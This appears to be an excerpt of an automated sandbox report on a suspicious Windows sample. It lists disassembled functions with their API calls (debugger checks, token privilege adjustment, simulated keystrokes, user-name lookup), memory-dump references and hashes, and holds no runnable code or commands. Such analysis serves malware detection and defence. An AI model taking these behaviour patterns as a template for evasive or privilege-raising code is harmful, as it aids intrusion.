                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 234945975-0
                                                                                                    • Opcode ID: 11c6c656b0a5c2f2511444794582d1a1154ddfe6a38cf2576e64c6db98ea94be
                                                                                                    • Instruction ID: 269a8ac449736547499e0b46ebaff8ff334678bb6ef49bd0bb6023dd57c572bf
                                                                                                    • Opcode Fuzzy Hash: 11c6c656b0a5c2f2511444794582d1a1154ddfe6a38cf2576e64c6db98ea94be
                                                                                                    • Instruction Fuzzy Hash: 9C219DB1604306EBDB20DFA5CA48BA7B7FCEB40764F10481EE64692151E774EE44DBA4
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009A82AA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen
                                                                                                    • String ID: ($|
                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                    • Opcode ID: b86e5288f15723e40b4a1dbcddbd3dc89c3446b1c9e2efee36ec7df74ab0f4f9
                                                                                                    • Instruction ID: 1001a2fc9acd817f53d54782b1e5202ecde5621f5a46de1936d9bcc194b5cba9
                                                                                                    • Opcode Fuzzy Hash: b86e5288f15723e40b4a1dbcddbd3dc89c3446b1c9e2efee36ec7df74ab0f4f9
                                                                                                    • Instruction Fuzzy Hash: B3322575A007059FCB28CF59C481A6AB7F4FF48710B15C56EE89ADB7A1EB70E941CB80
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009B5CC1
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009B5D17
                                                                                                    • FindClose.KERNEL32(?), ref: 009B5D5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 3541575487-0
                                                                                                    • Opcode ID: b1c688b200847d438b8b8ea63fb796c0e69797425e964b0948a4b1f7ff4d3002
                                                                                                    • Instruction ID: 1a6fa8f0c97c10c5d6e92a8747c6e2e21e7d3fc09bee6799a5fe3c197e6a30cf
                                                                                                    • Opcode Fuzzy Hash: b1c688b200847d438b8b8ea63fb796c0e69797425e964b0948a4b1f7ff4d3002
                                                                                                    • Instruction Fuzzy Hash: 255168746046019FC714DF28C494F96B7E8FF89324F158A5EE99A8B3A1CB30E945CB91
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0097271A
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00972724
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00972731
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: c6285e0dcc4147ea9fbb872b30e9d3e9836474fde4db53f69c882e805b5f0bf2
                                                                                                    • Instruction ID: 63462bdc78335ab1f86129b8ffc04bf73dd26fe679fa21644433ba6bccf8a10a
                                                                                                    • Opcode Fuzzy Hash: c6285e0dcc4147ea9fbb872b30e9d3e9836474fde4db53f69c882e805b5f0bf2
                                                                                                    • Instruction Fuzzy Hash: DB31D67595121C9BCB21DF68DD897DDB7B8AF58310F5042EAE81CA7260E7309F818F44
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009B51DA
                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009B5238
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 009B52A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1682464887-0
                                                                                                    • Opcode ID: c321237ec55ccf3eb6585a587fe23fbad959cb55ef02dc1a6dfeb9ee87737ee6
                                                                                                    • Instruction ID: d71567c21df6534b9b3bb7f3197c6c6296f9fee6a71101d8423f5ba7628b0d83
                                                                                                    • Opcode Fuzzy Hash: c321237ec55ccf3eb6585a587fe23fbad959cb55ef02dc1a6dfeb9ee87737ee6
                                                                                                    • Instruction Fuzzy Hash: 68315E75A00518DFDB00DF94D888FADBBB4FF49314F058099E805AB366DB35E856CB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 0095FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00960668
                                                                                                      • Part of subcall function 0095FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00960685
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009A170D
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009A173A
                                                                                                    • GetLastError.KERNEL32 ref: 009A174A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 577356006-0
                                                                                                    • Opcode ID: 67eef0284ab7dcd887a0874ef59554340efdf1df4297378c91e12ac7f962d05e
                                                                                                    • Instruction ID: 00eb6af701708f41d1fef2e58e75a6604f2f084af042f18a685b0a14019beb72
                                                                                                    • Opcode Fuzzy Hash: 67eef0284ab7dcd887a0874ef59554340efdf1df4297378c91e12ac7f962d05e
                                                                                                    • Instruction Fuzzy Hash: 0511CEB2414305AFD718EF54DC86E6AB7BDEB44724B20852EE45697281EB70BC81CB60
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009AD608
                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 009AD645
                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009AD650
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 33631002-0
                                                                                                    • Opcode ID: 0e14470d5c90ceb815c004824b2925cfbeb416eee0cd04b8e606394e53ebba90
                                                                                                    • Instruction ID: 32a26323c06d961702cd3c61fc5a6d3a85c15247732e630f87be6da8c17478f1
                                                                                                    • Opcode Fuzzy Hash: 0e14470d5c90ceb815c004824b2925cfbeb416eee0cd04b8e606394e53ebba90
                                                                                                    • Instruction Fuzzy Hash: 76118EB1E46228BFDB148F94DC44FAFBBBCEB45B50F108112F904E7290C2704A018BE1
                                                                                                    APIs
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009A168C
                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009A16A1
                                                                                                    • FreeSid.ADVAPI32(?), ref: 009A16B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3429775523-0
                                                                                                    • Opcode ID: c25582d2fa8ea9b7df2b7cd132eb42847a215672ef015dd55b423c9f6cd68f3e
                                                                                                    • Instruction ID: 40dd2d591c4623e10502dd55f78f5e92eafe8f24b94012af2a24e57f00fcf8b0
                                                                                                    • Opcode Fuzzy Hash: c25582d2fa8ea9b7df2b7cd132eb42847a215672ef015dd55b423c9f6cd68f3e
                                                                                                    • Instruction Fuzzy Hash: 89F0F4B19A5309FBDF00DFE4DC89AAEBBBCEB08644F504565E501E2181E774AA849A50
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000,?,009728E9), ref: 00964D09
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000,?,009728E9), ref: 00964D10
                                                                                                    • ExitProcess.KERNEL32 ref: 00964D22
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: d0b715ce677e4e18fc2ae9f2459aaddf3127ffc54273694a045f7b79203b5377
                                                                                                    • Instruction ID: 848cf9996c3ebf2874a3f25d1ccf7dde6f763a2f9d5755eb0707b6315b7b8319
                                                                                                    • Opcode Fuzzy Hash: d0b715ce677e4e18fc2ae9f2459aaddf3127ffc54273694a045f7b79203b5377
                                                                                                    • Instruction Fuzzy Hash: F6E0B671455149ABCF11AF94DE1AA587B6DEB81781F108015FC098B162CB35ED82EB80
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: f54e5aad89dad155647477fb2b3239d031d82df317ae08451b6efd81ee42b7d2
                                                                                                    • Instruction ID: b75693996a18da39e218bbd08a5f251e4b3dd88b21468c1ff2a53b8595d6f971
                                                                                                    • Opcode Fuzzy Hash: f54e5aad89dad155647477fb2b3239d031d82df317ae08451b6efd81ee42b7d2
                                                                                                    • Instruction Fuzzy Hash: 714136B3900219ABCB209FB9CC89EAB77BCEBC4314F10826DF919D7181E6309D81CB50
                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0099D28C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID: X64
                                                                                                    • API String ID: 2645101109-893830106
                                                                                                    • Opcode ID: 43d7276a6454edee741461f37de1dc4c3c4bec081c2e17df00db70ccfa5ad8f7
                                                                                                    • Instruction ID: 0015086f38446dd6a4083518860a1b14bb8e085d90a16bcedf432a10658d1516
                                                                                                    • Opcode Fuzzy Hash: 43d7276a6454edee741461f37de1dc4c3c4bec081c2e17df00db70ccfa5ad8f7
                                                                                                    • Instruction Fuzzy Hash: 8DD0C9B481611DEACF90CBA0DCC8DDDB37CBB04305F100552F506A2080D73495489F10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                    • Instruction ID: f16327a1e84d9c949998d02a5f33880f753af14d1b96c40bb3a3e8e7b6e8f4c6
                                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                    • Instruction Fuzzy Hash: 40023DB1E001199BDF14CFA9C8806ADBBF5EF88314F25856AE859E7380D731AD41CB94
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 009B6918
                                                                                                    • FindClose.KERNEL32(00000000), ref: 009B6961
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: e41128f22e42a52003f121b4f8ef48f705cc1a47f9f036f745485c6e6c783aac
                                                                                                    • Instruction ID: d246cc1e62f5d463b718391ad7efce85aab709859dfe5e528df37612ef1370d0
                                                                                                    • Opcode Fuzzy Hash: e41128f22e42a52003f121b4f8ef48f705cc1a47f9f036f745485c6e6c783aac
                                                                                                    • Instruction Fuzzy Hash: B311D0716042019FC710CF29C484E16BBE4FF84328F04C699F8698F2A2C734EC45CB90
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009C4891,?,?,00000035,?), ref: 009B37E4
                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009C4891,?,?,00000035,?), ref: 009B37F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: b7bbf7c4e737640002198aee2753396912dae740b0c9e5cfe6af4e762a5d9f6a
                                                                                                    • Instruction ID: 2560f01f4f024dc019640b0f5e57dedbd71dd81936544cfcb4857bd414d49c61
                                                                                                    • Opcode Fuzzy Hash: b7bbf7c4e737640002198aee2753396912dae740b0c9e5cfe6af4e762a5d9f6a
                                                                                                    • Instruction Fuzzy Hash: 1AF0ECB06052256AD71057655C8DFDB775DDFC4771F004165F509D2281D9609944C7B0
                                                                                                    APIs
                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009AB25D
                                                                                                    • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 009AB270
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InputSendkeybd_event
                                                                                                    • String ID:
                                                                                                    • API String ID: 3536248340-0
                                                                                                    • Opcode ID: 10e61776f3b5c5a5370a2d83694d1fe17fddf0427508c98d70cf8a5eacb2b813
                                                                                                    • Instruction ID: c0ddb77f153322ded8116524b2e90bdcce38d48e2e6adc2ed7ed2bfc1cf625c6
                                                                                                    • Opcode Fuzzy Hash: 10e61776f3b5c5a5370a2d83694d1fe17fddf0427508c98d70cf8a5eacb2b813
                                                                                                    • Instruction Fuzzy Hash: 4EF06D7185424EABDB058FA0C805BAE7BB4FF04305F00800AF961A5192C3798241DF94
                                                                                                    APIs
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009A11FC), ref: 009A10D4
                                                                                                    • CloseHandle.KERNEL32(?,?,009A11FC), ref: 009A10E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: d4a5ca0f756a20ab376d4706a0cec2683e454beb8ace3f8cfc2df9b309548c73
                                                                                                    • Instruction ID: 3849afc579eac136f267f8189a6e3d89f1cf7fcca40a4175620a22234b6194df
                                                                                                    • Opcode Fuzzy Hash: d4a5ca0f756a20ab376d4706a0cec2683e454beb8ace3f8cfc2df9b309548c73
                                                                                                    • Instruction Fuzzy Hash: 9FE04F72058611AEE7252B51FC06F7377A9EB04321F10882EF8A5804B1DB626CD0EB50
                                                                                                    Strings
                                                                                                    • Variable is not of type 'Object'., xrefs: 00990C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                    • API String ID: 0-1840281001
                                                                                                    • Opcode ID: e8cdc8a4d9c33eb49c51d8930abfe9346c06a4e7bab043daf5f2e6cb4cbe6e14
                                                                                                    • Instruction ID: be62bd7414a7cd808cd01445f244c5b2663119194fc39a30f48c137f13a2e24c
                                                                                                    • Opcode Fuzzy Hash: e8cdc8a4d9c33eb49c51d8930abfe9346c06a4e7bab043daf5f2e6cb4cbe6e14
                                                                                                    • Instruction Fuzzy Hash: 12328CB0901218DFCF54DF94C885FEDB7B9BF84304F148569E816AB292D739AE49CB60
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00976766,?,?,00000008,?,?,0097FEFE,00000000), ref: 00976998
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
